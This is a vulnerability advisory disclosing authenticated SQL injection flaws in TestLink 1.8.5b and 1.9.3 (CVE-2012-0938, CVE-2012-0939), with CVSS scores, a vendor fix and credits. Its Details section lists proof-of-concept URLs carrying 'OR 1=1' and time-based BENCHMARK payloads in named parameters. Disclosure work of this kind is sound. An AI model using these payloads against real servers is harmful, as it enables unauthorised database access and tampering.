TestLink 1.9.3 SQL Injection

`------------------  
Information  
------------------  
Name: SQL Injection Vulnerabilities in TestLink  
Software tested: TL v1.8.5b & checked in v1.9.3 (prior version may be  
affected)  
Vendor Homepage: http://www.teamst.org  
Vendor Notification: 27 January 2012  
Vendor Patch: 4 February 2012  
Public Disclosure: 20 February 2012  
CVE: CVE-2012-0938 & CVE-2012-0939  
Solution Status: Fixed by Vendor  
  
  
------------------  
Description  
------------------  
TestLink is a web based test management and test execution system. It  
enables quality assurance teams to create and manage their test cases as  
well as to organize them into test plans. These test plans allow team  
members to execute test cases and track test results dynamically.  
  
TestLink is a GPL licensed open source project.  
  
  
------------------  
Details  
------------------  
CVE-2012-0938:  
TestLink v1.8.5b & 1.9.3 are affected by some SQL Injection  
vulnerabilities (other versions also maybe affected).  
To successfully exploit these vulnerabilities, a remote attacker must  
login with a valid user account. Some cases need a different role to be  
exploited.  
CVSS v2: 6.5  
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P  
Example PoC URLs are:  
  
http://example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1  
http://example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1  
http://example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND  
3653=BENCHMARK(5000000,MD5(1))  
http://example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7  
AND 5912=BENCHMARK(5000000,MD5(1))  
http://example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623  
AND 5912=BENCHMARK(5000000,MD5(1))  
http://example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622  
AND 5912=BENCHMARK(5000000,MD5(1))  
http://example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND  
5912=BENCHMARK(5000000,MD5(1))  
  
CVE-2012-0939:  
TestLink v1.8.5b is affected by some SQL Injection vulnerabilities  
(other versions also maybe affected).  
To successfully exploit these vulnerabilities, a remote attacker must  
login with a valid user account. Some cases need a different role to be  
exploited.  
CVSS v2: 6.5  
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P  
Example PoC URLs are:  
  
http://example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622  
OR 1=1  
http://example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622  
AND 5912=BENCHMARK(5000000,MD5(1))  
http://example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND  
5912=BENCHMARK(5000000,MD5(1))  
  
  
------------------  
Solution  
------------------  
The vendor fixed these vulnerabilities in a patch for version 1.9.3.  
Please see the references.  
  
  
------------------  
References  
------------------  
Vendor URL / Patch : http://mantis.testlink.org/view.php?id=4906  
CVE-2012-0938: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0938  
CVE-2012-0939: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0939  
  
  
------------------  
Credits  
------------------  
Researcher: Juan M. Natal  
Company: INTECO (http://www.inteco.es)  
Contact: jnatal [at] cert [dot] inteco [dot] es  
  
Thanks to: J. Valentin Gutierrez (@vnico) & Juan C. Montes (@jcmontes_tec)  
  
  
------------------  
Disclaimer  
------------------  
The information provided in this Advisory is provided "as is" and  
without any warranty of any kind. Details of this Advisory may be  
updated in order to provide as accurate information as possible.  
`